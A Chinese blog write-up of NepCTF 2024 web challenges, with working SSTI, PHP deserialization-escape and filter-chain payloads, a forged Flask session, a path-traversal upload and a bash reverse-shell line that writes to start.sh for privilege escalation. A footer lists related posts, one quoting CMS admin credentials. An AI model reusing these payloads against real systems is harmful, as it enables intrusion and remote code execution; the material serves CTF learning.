NepCTF 2024 部分web

于 2024-08-31 00:21:38 发布
阅读量955 收藏 6
点赞数 16
文章标签: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/141682571
版权

NepDouble

from flask import Flask, request,render_template,render_template_string
from zipfile import ZipFile
import os
import datetime
import hashlib
from jinja2 import Environment, FileSystemLoader

app = Flask(__name__,template_folder='static')
app.config['MAX_CONTENT_LENGTH'] = 1 * 1024 * 1024

UPLOAD_FOLDER = '/app/uploads'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER

if not os.path.exists(UPLOAD_FOLDER):
    os.makedirs(UPLOAD_FOLDER)

template_env = Environment(loader=FileSystemLoader('static'), autoescape=True)


def render_template(template_name, **context):
    template = template_env.get_template(template_name)
    return template.render(**context)

def render_template_string(template_string, **context):
    template = template_env.from_string(template_string)
    return template.render(**context)

@app.route('/', methods=['GET', 'POST'])
def main():
    if request.method != "POST":
        return 'Please use POST method to upload files.'

    try:
        clear_uploads_folder()
        files = request.files.get('tp_file', None) #tp_file参数上传文件
        if not files:
            return 'No file uploaded.'

        file_size = len(files.read())
        files.seek(0)

        file_extension = files.filename.rsplit('.', 1)[-1].lower()
        if file_extension != 'zip':
            return 'Invalid file type. Please upload a .zip file.'

        timestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S') #当前时间
        md5_dir_name = hashlib.md5(timestamp.encode()).hexdigest()
        unzip_folder = os.path.join(app.config['UPLOAD_FOLDER'], md5_dir_name)
        os.makedirs(unzip_folder, exist_ok=True)

        with ZipFile(files) as zip_file:
            zip_file.extractall(path=unzip_folder)# 解压zip文件到指定目录

        files_list = []
        for root, dirs, files in os.walk(unzip_folder):
            for file in files:
                print(file)
                file_path = os.path.join(root, file) # /app/uploads/[md5值]/file名字
                relative_path = os.path.relpath(file_path, app.config['UPLOAD_FOLDER'])
                # 获取相对路径 , app.config['UPLOAD_FOLDER']='/app/uploads'
                # relative_path: md5/file名字
                # file: file名字.zip
                link = f'<a href="/cat?file={relative_path}">{file}</a>'
                files_list.append(link)

        return render_template_string('<br>'.join(files_list))

    except ValueError:
        return 'Invalid filename.'
    
    except Exception as e:
        return 'An error occurred. Please check your file and try again.'

@app.route('/cat')
def cat():
    file_path = request.args.get('file')  #file参数
    if not file_path:
        return 'File path is missing.'

    new_file = os.path.join(app.config['UPLOAD_FOLDER'], file_path)
    if os.path.commonprefix([os.path.abspath(new_file), os.path.abspath(app.config['UPLOAD_FOLDER'])]) != os.path.abspath(app.config['UPLOAD_FOLDER']):
        return 'Invalid file path.'    #公共前缀

    if os.path.islink(new_file): #不能是一个符号链接
        return 'Symbolic links are not allowed.'
    
    try:
        filename = file_path.split('/')[-1]   #最后的文件名
        content = read_large_file(new_file)   #读取文件内容
        return render_template('test.html',content=content,filename=filename,dates=Exec_date())
    except FileNotFoundError:
        return 'File not found.'
    except IOError as e:
        return f'Error reading file: {str(e)}'

def Exec_date():
    d_res = os.popen('date').read()
    return d_res.split(" ")[-1].strip()+" "+d_res.split(" ")[-3]  #EDT 星期五

def clear_uploads_folder():
    for root, dirs, files in os.walk(app.config['UPLOAD_FOLDER'], topdown=False):
        for file in files:
            os.remove(os.path.join(root, file))
        for dir in dirs:
            os.rmdir(os.path.join(root, dir))

def read_large_file(file_path):
    content = ''
    with open(file_path, 'r') as file:
        for line in file:
            content += line
    return content

if __name__ == '__main__':
    app.run('0.0.0.0',port="8000",debug=False)

审计代码, render_template_string() 存在漏洞 渲染的是files_list , 里面存放的是文件名

所以可以想到通过文件名来入手, 且需要上传的是一个zip文件
{{().class}}.php压缩一下
首先上传一个 {{().class}}.zip

可以发现确实存在ssti注入漏洞
在这里插入图片描述照着ssti的思路写就行, 环境里面没有flag, 然后win的命名无法有 / , 就无法列出根目录, 需要用到 cd 命令绕过

import requests
url='https://neptune-49577.nepctf.lemonprefect.cn/'
filename= "{{().__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cd ..&&cd ..&&cat flag').read()}}.zip"
files={'tp_file':open(filename,'rb')}
res=requests.post(url=url,files=files)
print(res.text)

PHP_MASTER!!

(复现)

<?php
highlight_file( __FILE__);
error_reporting(0);

function substrstr($data)
{
    $start = mb_strpos($data, "[");
    $end = mb_strpos($data, "]");
    return mb_substr($data, $start + 1, $end - 1 - $start);
}
class A{
    public $key;
    public function readflag(){
        if($this->key=== "\0key\0"){
            $a = $_POST[1];
            $contents = file_get_contents($a);
            file_put_contents($a, $contents);

        }
    }
}


class B
{

    public $b;
    public function __tostring()
    {
        if(preg_match("/\[|\]/i", $_GET['nep'])){
            die("NONONO!!!");
        }
        $str = substrstr($_GET['nep1']."[welcome to". $_GET['nep']."CTF]");
        echo $str;
        if ($str==='NepCTF]'){
            return ($this->b) ();
        }

    }
}
class C
{

    public $s;

    public $str;

    public function __construct($s)
    {
        $this->s = $s;
    }

    public function __destruct()
    {


        echo $this ->str;
    }
}
$ser = serialize(new C($_GET['c']));
$data = str_ireplace("\0","00",$ser);
unserialize($data);

首先看到B类, 需要绕过
一个知识点: mb_strposmb_substr执行差异导致的漏洞
简单说就是

%9f可以造成字符串往后移动一位,因为它不解析,%f0可以把字符串吞掉前三位
%f0配合任意的三个字符结合%9f就可以达到字符串逃逸
具体可以看:https://www.cnblogs.com/gxngxngxn/p/18187578

当然也可以不利用这个这个漏洞, 自己配凑

本地尝试一下

<?php
highlight_file(__FILE__);
function substrstr($data) 
{
    $start = mb_strpos($data, "[");
    $end = mb_strpos($data, "]");
    echo 'end='.$end.'<br>';
    echo 'start='.$start.'<br>';
    $a=$end - 1 - $start.'<br>';
    echo 'len='.$a;
    echo '<br>';
    return mb_substr($data, $start + 1, $end - 1 - $start);
}
$aaa=$_GET['nep1']."[welcome to". $_GET['nep']."CTF]";
echo $aaa.'<br>';
$str = substrstr($_GET['nep1']."[welcome to". $_GET['nep']."CTF]");//倒着开始
if(preg_match("/\[|\]/i", $_GET['nep'])){
    die("NONONO!!!");
}
echo $str;
if ($str==='NepCTF]'){
    echo 'ok';
}

?nep1=%f0aaa%f0aaa%f0aaa%f0&nep=00Nep
或者:
?nep1=%f0aaa%f0aaa%f0aaa%f0%9f%9f&nep=Nep
或者:
?nep1=]aaaaaaaaaaaaaaaaaa[NepCTF]]1&nep=Nep

再看到这个 str_ireplace("\0","00",$ser); 会存在一个反序列逃逸的漏洞, 经过替换之后, 字符会增多, 一次替换多出一个字符

非预期

直接在B类里面调用到phpinfo(),存在flag
";s:3:"str";O:1:"B":1:{s:1:"b";s:7:"phpinfo";}}有47个字符需要逃逸,
所以%00需要47个
payload:

?nep1=]aaaaaaaaaaaaaaaaaa[NepCTF]]1&nep=Nep&c=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00";s:3:"str";O:1:"B":1:{s:1:"b";s:7:"phpinfo";}}

在这里插入图片描述

预期解

if($this->key=== "\0key\0")需要使用16进制绕过
令key=“\00key\00
需要逃逸的字符(100个)
";s:3:"str";O:1:"B":1:{s:1:"b";a:2:{i:0;O:1:"A":1:{s:3:"key";s:5:"\00key\00";}i:1;s:8:"readflag";}}}

%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00";s:3:"str";O:1:"B":1:{s:1:"b";a:2:{i:0;O:1:"A":1:{s:3:"key";S:5:"\00key\00";}i:1;s:8:"readflag";}}}

进入到A类

$a = $_POST[1];
$contents = file_get_contents($a);
file_put_contents($a, $contents);

filter chain覆盖掉当前的index.php
POST传参

1=php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF-8.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF-8.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php

然后再?cmd=system("env")
在这里插入图片描述

蹦蹦炸弹(boom_it)

(复现)
审计代码

from flask import Flask, render_template, request, session, redirect, url_for
import threading
import random
import string
import datetime
import rsa
from werkzeug.utils import secure_filename
import os
import subprocess

(pubkey, privkey) = rsa.newkeys(2048)

app = Flask(__name__)
app.secret_key = "super_secret_key"



UPLOAD_FOLDER = 'templates/uploads'
ALLOWED_EXTENSIONS = {'png', 'jpg', 'txt'}

app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER

def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/admin', methods=['GET', 'POST'])
def admin():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        if username == 'admin' and password == users.get('admin', {}).get('password'):
            session['admin_logged_in'] = True
            return redirect(url_for('admin_dashboard'))
        else:
            return "Invalid credentials", 401
    return render_template('admin_login.html')

@app.route('/admin/dashboard', methods=['GET', 'POST'])
def admin_dashboard():
    if not session.get('admin_logged_in'):
        return redirect(url_for('admin'))

    if request.method == 'POST':
        if 'file' in request.files:
            file = request.files['file']
        if file.filename == '':
            return 'No selected file'
        filename = file.filename
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        return 'File uploaded successfully'

    cmd_output = ""
    if 'cmd' in request.args:
        if os.path.exists("lock.txt"):  # 检查当前目录下是否存在lock.txt
            cmd = request.args.get('cmd')
            try:
                cmd_output = subprocess.check_output(cmd, shell=True).decode('utf-8')
            except Exception as e:
                cmd_output = str(e)
        else:
            cmd_output = "lock.txt not found. Command execution not allowed."
    return render_template('admin_dashboard.html', users=users, cmd_output=cmd_output, active_tab="cmdExecute")


@app.route('/admin/logout')
def admin_logout():
    session.pop('admin_logged_in', None)
    return redirect(url_for('index'))

# Generate random users
def generate_random_users(n):
    users = {}
    for _ in range(n):
        username = ''.join(random.choices(string.ascii_letters + string.digits, k=15))
        password = ''.join(random.choices(string.ascii_letters + string.digits, k=15))
        users[username] = {"password": password, "balance": 2000}
    return users

users = generate_random_users(1000)
users["HRP"] = {"password": "HRP", "balance": 6000}

# Add an admin user with a random password
admin_password = ''.join(random.choices(string.ascii_letters + string.digits, k=15))
users["admin"] = {"password": admin_password, "balance": 0}

flag_price = 10000
flag = admin_password  # The flag is the password of the admin user
mutex = threading.Lock()


@app.route('/')
def index():
    if "username" in session:
        return render_template("index.html", logged_in=True, username=session["username"], balance=users[session["username"]]["balance"])
    return render_template("index.html", logged_in=False)

@app.route('/reset', methods=['GET'])
def reset():
    global users
    users = {}  # Clear all existing users
    users = generate_random_users(1000)
    users["HRP"] = {"password": "HRP", "balance": 6000}
    global admin_password
    admin_password={}
    global flag
    # Add an admin user with a random password
    admin_password = ''.join(random.choices(string.ascii_letters + string.digits, k=15))
    flag=admin_password

    users["admin"] = {"password": admin_password, "balance": 0}
    
    return redirect(url_for('index'))


@app.route('/login', methods=["POST"])
def login():
    username = request.form.get("username")
    password = request.form.get("password")
    if username in users and users[username]["password"] == password:
        session["username"] = username
        return redirect(url_for('index'))
    return "Invalid credentials", 403

@app.route('/logout')
def logout():
    session.pop("username", None)
    return redirect(url_for('index'))


def log_transfer(sender, receiver, amount):
    def encrypt_data_with_rsa(data, pubkey):
        for _ in range(200):  # Encrypt the data multiple times
            encrypted_data = rsa.encrypt(data.encode(), pubkey)
        return encrypted_data.hex()

    timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
    
    # Encrypt the amount and timestamp
    encrypted_amount = encrypt_data_with_rsa(str(amount), pubkey)
    encrypted_timestamp = encrypt_data_with_rsa(timestamp, pubkey)
    
    log_data = f"{encrypted_timestamp} - Transfer from {sender} to {receiver} of encrypted amount {encrypted_amount}\n"
    
    for _ in range(1): 
        log_data += f"Transaction initiated from device: {random.choice(['Mobile', 'Web', 'ATM', 'In-Branch Terminal'])}\n"
        log_data += f"Initiator IP address: {random.choice(['192.168.1.', '10.0.0.', '172.16.0.'])}{random.randint(1, 254)}\n"
        log_data += f"Initiator geolocation: Latitude {random.uniform(-90, 90):.6f}, Longitude {random.uniform(-180, 180):.6f}\n"
        log_data += f"Receiver's last login device: {random.choice(['Mobile', 'Web', 'ATM'])}\n"
        log_data += f"Associated fees: ${random.uniform(0.1, 3.0):.2f}\n"
        log_data += f"Remarks: {random.choice(['Regular transfer', 'Payment for invoice #'+str(random.randint(1000,9999)), 'Refund for transaction #'+str(random.randint(1000,9999))])}\n"
        log_data += "-"*50 + "\n"

    with open('transfer_log.txt', 'a') as f:
        f.write(log_data)




@app.route('/transfer', methods=["POST"])
def transfer():
    if "username" not in session:
        return "Not logged in", 403
    
    receivers = request.form.getlist("receiver")
    amount = int(request.form.get("amount"))
    if amount <0:
        return "Insufficient funds", 400
    logging_enabled = request.form.get("logs", "false").lower() == "true"
    
    if session["username"] in receivers:
        return "Cannot transfer to self", 400
    
    for receiver in receivers:
        if receiver not in users:
            return f"Invalid user {receiver}", 400
    
    total_amount = amount * len(receivers)
    if users[session["username"]]["balance"] >= total_amount:
        for receiver in receivers:
            if logging_enabled:
                log_transfer(session["username"], receiver, amount)
            mutex.acquire()
            users[session["username"]]["balance"] -= amount
            users[receiver]["balance"] += amount
            mutex.release()
        return redirect(url_for('index'))
    return "Insufficient funds", 400


@app.route('/buy_flag')
def buy_flag():
    if "username" not in session:
        return "Not logged in", 403

    if users[session["username"]]["balance"] >= flag_price:
        users[session["username"]]["balance"] -= flag_price
        return f"Here is your flag: {flag}"
    return "Insufficient funds", 400

@app.route('/get_users', methods=["GET"])
def get_users():
    num = int(request.args.get('num', 1000))
    selected_users = random.sample(list(users.keys()), num)
    return {"users": selected_users}

@app.route('/view_balance/<username>', methods=["GET"])
def view_balance(username):
    if username in users:
        return {"username": username, "balance": users[username]["balance"]}
    return "User not found", 404

@app.route('/force_buy_flag', methods=["POST"])
def force_buy_flag():
    if "username" not in session or session["username"] != "HRP":
        return "Permission denied", 403

    target_user = request.form.get("target_user")
    if target_user not in users:
        return "User not found", 404

    if users[target_user]["balance"] >= flag_price:
        users[target_user]["balance"] -= flag_price
        return f"User {target_user} successfully bought the flag!,"+f"Here is your flag: {flag}"
    return f"User {target_user} does not have sufficient funds", 400


if __name__ == "__main__":
    app.run(host='0.0.0.0',debug=False)

存在key, 可以伪造session
在这里插入图片描述eyJ1c3JlbmFtZSI6IkhSUCIsImFkbWluX2xvZ2dlZF9pbiI6dHJ1ZX0.ZtCauw.tKvorvOMmiAHuANILCxqu1Lvu2Y
就可以直接登录到 admin的身份了

需要上传一个文件到当前目录, 就可以通过cmd参数执行命令
在这里插入图片描述

上传文件:

import requests

session=requests.session()

url='https://neptune-45032.nepctf.lemonprefect.cn/admin/dashboard'
cookie={"session":"eyJ1c3JlbmFtZSI6IkhSUCIsImFkbWluX2xvZ2dlZF9pbiI6dHJ1ZX0.ZtCauw.tKvorvOMmiAHuANILCxqu1Lvu2Y"}
file_path='./lock.txt'
with open(file_path, 'rb') as f:
    files={'file': ('../../lock.txt', f)} //路径穿越, 确保文件在当前目录
    upload_res=session.post(url,cookies=cookie,files=files)
print(upload_res.text)

在这里插入图片描述上传成功后, 可以以cmd参数传递命令
在这里插入图片描述

没办法cat flag
在这里插入图片描述但是start.sh文件可写(ls -al查看权限), 写入一些内容来反弹shell
?cmd=echo+"bash+-i+>%26+/dev/tcp/[ip]/80+0>%261"+>+start.sh

?cmd=bash+start.sh
成功反弹
在这里插入图片描述
执行命令ps -aux
可以看到一个/usr/sbin/xinetd是由root权限得到的
查看etc/xinetd.d/看到pwnservice里面有个端口8888,并且这个可以写入,可以尝试利用8888进行连接
需要echo "./pwn;chmod 777 /home/ctfuser/*" >> /home/ctfuser/start.sh改为最大权限

然后nc 127.0.0.1 8888
或者

python3 -c "import socket;sock = socket.socket();sock.connect(('127.0.0.1', 8888));"

随后ls -al可以发现flag有权限打开了, 可以cat
在这里插入图片描述参考文章:https://0ran9ewww.github.io/2024/08/28/nepctf/nepctf2024/#%E8%B9%A6%E8%B9%A6%E7%82%B8%E5%BC%B9%EF%BC%88boom-it%EF%BC%89

pwfortune
关注
  • 16
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebNepCTF 2024题解
uuzeray的博客
08-26 738
这里要求存在一个用户NepNepIStheBestTeam,在前面就注册这个用户就能登录8080端口。找到拿字符串的html位置,手改成自己的 id,然后注册。第一个注册流程,无论给什么图片都是TEST。数据占用打崩,让服务重启反弹shell。对着CVE-2024-37084复现。参数不能带空格,用${IFS}flag在phpinfo里。start.sh有权限更改。反弹shell拿flag。upload.py上传。root权限读flag。zip包转字节列表脚本。在文件名处打SSTI。生成恶意文件名的文件。
Nepctf2024-Web-NepDouble
Sa1nZen的博客
09-01 320
Nepctf2024-Web-NepDouble
nepctf2023 部分web复现
weixin_63231007的博客
09-01 885
我们需要写一个plugin进去,但是不能直接写进去,因为plugin目录没权限写但是由于当前我们有root权限的数据库用户,我们可以使用select into dumpfile的形式写入:当以 root 用户身份执行 SELECT INTO DUMPFILE 查询时,它将绕过文件权限检查,并允许将查询结果写入任何有效的文件路径中,即使该路径对 mysql 用户是无法写入的。请注意,使用 root 用户执行此操作需要格外小心,因为它会绕过一些安全限制。
2022NepCTF部分WP
XINO
08-04 3416
发现是个压缩包套娃,用010看见一个流量包,直接选中数据的硬生生的提出来,虽然损坏了但是流量包可以打开,接下来发现是个键盘流量,用工具一把梭。分别作为p,q,用得到的p,q与c_mod_p,c_mod_q代入CRT方程,x等于c mod p,c 就恒等于 x % mi,.osu后缀,查了下发现是音游的文件,放软件里进行挑战,发现谱面里描出来了flag。根据旁边的如家酒店,我们用谷歌地图搜一下海南地区的如家,发现举例的一个跟图片上一样。B站直播说是最近的模板注入漏洞,就简单搜了一下,还真找到了。...
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3370
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
NepCTF2023--部分wp
qing_chuan_的博客
08-14 438
下载拿到piano.bin,是个音频文件,拉进Audacity看一下,发现有频谱,通过放大缩小频谱发现有字符串,将字符串抄写下来,钱一部分是摩斯密码,后部分是16进制。去搜Atsuko Kagari”,发现为小魔女学园动漫女主角,去看了动漫,发现里面有着文字,新月文字和古龙语,去上网找解释。这道题就是个游戏,就是自己和机器人下棋,你自己先先连出来42和5子棋就可得到flag,不想在复现一遍了。题目说是一种很老的cve,题目又是java-checkin,上网搜,找到一个跟java有关得cve。
nepctf——web知识点小记~
borrrrring的博客
04-08 332
原型链污染 什么是原型? 所有引用类型都有一个__proto__(隐式原型)属性,属性值是一个普通的对象 所有函数都有一个prototype(原型)属性,属性值是一个普通的对象 所有引用类型的__proto__属性指向它构造函数的prototype 什么是原型链? 当访问一个对象的某个属性时,会先在这个对象本身属性上查找,如果没有找到,则会去它的__proto__隐式原型上查找,即它的构造函数的prototype。如果还没有找到就会再在构造函数的prototype的__proto__中查找,这样一层一层
Nepctf 2023学习
weixin_47063945的博客
08-19 300
太过浮躁,没办法沉下心来做题,可以先从ak人数多的题目入手要尽力去做题,这样赛后复盘才能学到东西第一次接触misc,misc方向确实需要一点脑洞。
NepCTF2022 WP
Pysnow's Blog
07-20 2196
NepCTFWriteUp
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
NepCTF2022 WEB 博学多闻的花花详解
SHININGENDING的博客
07-18 1045
有意思的一道题
[NepCTF]WEB
Huamang的博客
03-23 596
梦里花开牡丹亭 涉及到: pop链 命令执行 短字符命令执行 反序列化,代码审计 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register; public $file; public $fi
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4369
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
2024影视泛系统,CMS苹果V10二开影视泛程序,苹果影视泛目录.txt
09-02
后台地址:http://域名/shensss.php/admin/index/login.html 账号和密码:admin 数据库:lao 密码pFSGtemHShMTszhB 数据库文件:根目录/application/database.php 伪静态: if (!-e $request_filename) { rewrite ^/index.php(.*)$ /index.php?s=$1 last; rewrite ^/api.php(.*)$ /api.php?s=$1 last; rewrite ^/shensss.php(.*)$ /shensss.php?s=$1 last; rewrite ^(.*)$ /index.php?s=$1 last; break; } rewrite ^/vod-(.*)$ /index.php?m=vod-$1 break; rewrite ^/art-(.*)$ /index.php?m=art-$1 break; rewrite ^/gbook-(.*)$ /index.php?m=gbook-$1 bre
JSP001网络购物系统毕业课程设计源码
最新发布
09-02
编号:34 实现技术: Java + Sqlserver 包括网站前端用户和后台管理员。用户注册登录后可以根据商品类别和关键字查询商品,可以加入商品到购物车,下单购买,查询订单,修改个人信息,给管理员留言,查询销售排行榜和友情链接等;管理员登录后台后可以添加商品和管理商品,查询管理用户订单信息,查询管理员用户信息,添加友情链接,公告信息管理等。
大寺镇应急指挥系统PPT(58页).pptx
09-02
大寺镇应急指挥系统PPT(58页)
大数据管理与监控:Cloudera Manager:Sqoop数据导入导出技术.docx
09-02
